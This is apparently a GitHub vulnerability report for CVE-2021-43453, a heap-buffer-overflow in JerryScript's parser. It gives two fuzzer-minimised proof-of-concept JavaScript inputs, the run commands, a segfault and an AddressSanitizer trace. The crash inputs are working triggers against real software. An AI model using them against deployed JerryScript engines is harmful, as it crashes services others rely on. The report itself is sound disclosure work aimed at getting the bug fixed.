Headline
CVE-2021-43453: Heap-overflow on an ill-formed JS program · Issue #4754 · jerryscript-project/jerryscript
A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.
JerryScript revision
$ jerry --version Version: 3.0.0 (5a69b183)
Build platform
$ echo "$(lsb_release -ds) ($(uname -mrs))" Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64)
Build steps****Test case
There are two test cases, where jerry_poc_crash.js can trigger a direct crash of the clean-built jerry and jerry_poc_asan.js can trigger a heap-overflow of the ASAN-enabled-built jerry.
This bug is found by a naive fuzzer. And I use afl-tmin to reduce the test cases. I sincerely apologize for making them struggling.
- jerry_poc_crash.js
R=function(){({0:0}) function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0=function(){} class e
- jerry_poc_asan.js
R = function() { function x(){ function y(){ for(;;) for(function(){ class A extends function() { for(let;;) { ((function(){})) }
Execution steps
$ ~/release/jerryscript/build/bin/jerry jerry_poc_crash.js Segmentation fault (core dumped)
$ ~/asan/jerryscript/build/bin/jerry jerry_poc_asan.js ==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010 READ of size 1 at 0x612000005692 thread T0 #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e) #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2) #3 0x55555579d5c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9) #4 0x5555555dead1 (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1) #5 0x555555633868 (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868) #6 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #7 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #8 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #9 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #10 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #11 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #12 0x55555563e211 (/home/docker/asan/jerryscript/build/bin/jerry+0xea211) #13 0x5555555c1f67 (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67) #14 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #15 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #16 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #17 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #18 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #19 0x555555625454 (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454) #20 0x555555634129 (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129) #21 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #22 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #23 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #24 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #25 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #26 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #27 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #28 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #29 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #30 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #31 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #32 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #33 0x5555555ca181 (/home/docker/asan/jerryscript/build/bin/jerry+0x76181) #34 0x5555557c982d (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d) #35 0x55555592b342 (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342) #36 0x5555555718c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9) #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #38 0x555555580add (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd)
Address 0x612000005692 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) Shadow bytes around the buggy address: 0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c247fff8ad0: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38036==ABORTING Aborted
Output
See above.
Backtrace
See above.
Expected behavior
Not to crash